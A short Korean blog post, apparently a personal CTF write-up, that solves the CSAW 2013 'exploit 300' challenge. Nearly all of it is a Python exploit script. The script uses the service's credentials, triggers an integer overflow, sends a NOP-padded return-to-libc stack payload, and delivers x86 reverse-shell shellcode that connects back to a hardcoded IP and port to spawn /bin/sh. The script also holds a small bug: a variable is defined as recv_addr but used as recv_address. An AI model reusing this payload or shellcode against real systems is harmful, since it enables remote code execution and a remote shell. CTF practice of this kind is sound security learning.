csaw2013 exploit 300

아오 .. 엄청오래걸렷다 ... integer overflow 해서 RTL로 풀엇다 

+) ROP 다시 공부해야겟다 

+)PORT 넘버때매 꽤오래 헤맷는데 ㅡㅡ ; 알고보니까 htons() 에 hexa값으로 들어가있엇다 ㅡㅡ; 담부터는 이런실수 안해야지 

fil_chal

from socket import *
from struct import pack,unpack 
import time
import sys

p=lambda x:pack("<L",x)
up=lambda x:unpack("L",x)[0]

HOST="192.168.72.148"
PORT=34266

buf =  ""
buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
buf += "\xa8\x48\x94\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50"
buf += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
buf += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
buf += "\x0b\xcd\x80"

free=0x0804b000
recv_addr=0xf772c4e0
pr_addr=0x80495d4

offset='' #relative addres

system_addr =0xf75fb1f0 #메모장으로 복붙햇더니 짤려버림 ㄷㄷ 

s=socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
#starthere
s.recv(0x2A2)
s.recv(9)

#sendis
s.recv(20)#IDraw_input()
s.send("csaw2013")

s.recv(20)#passwordraw_input()
s.send("S1mplePWD")

s.recv(100) #URL

s.recv(30) #invalidcredn...

s.send(str(0xFFFF))#integerOverFlow
    
print s.recv(4096)
time.sleep(1)

payload =""
payload +="\x90"*(0x41c+4) #ebp
payload += p(recv_address)
payload += p(pr_addr)
payload += p(4)
payload += p(free)
payload += p(len(buf))
payload += p(0)
payload += p(system_addr)

s.send(payload)
s.send(buf)
raw_input("finally I solved by symnoisy>>")

+) pwnable.kr dragon 뭐로풀어야될지는 알겟는데 아직 감이안오네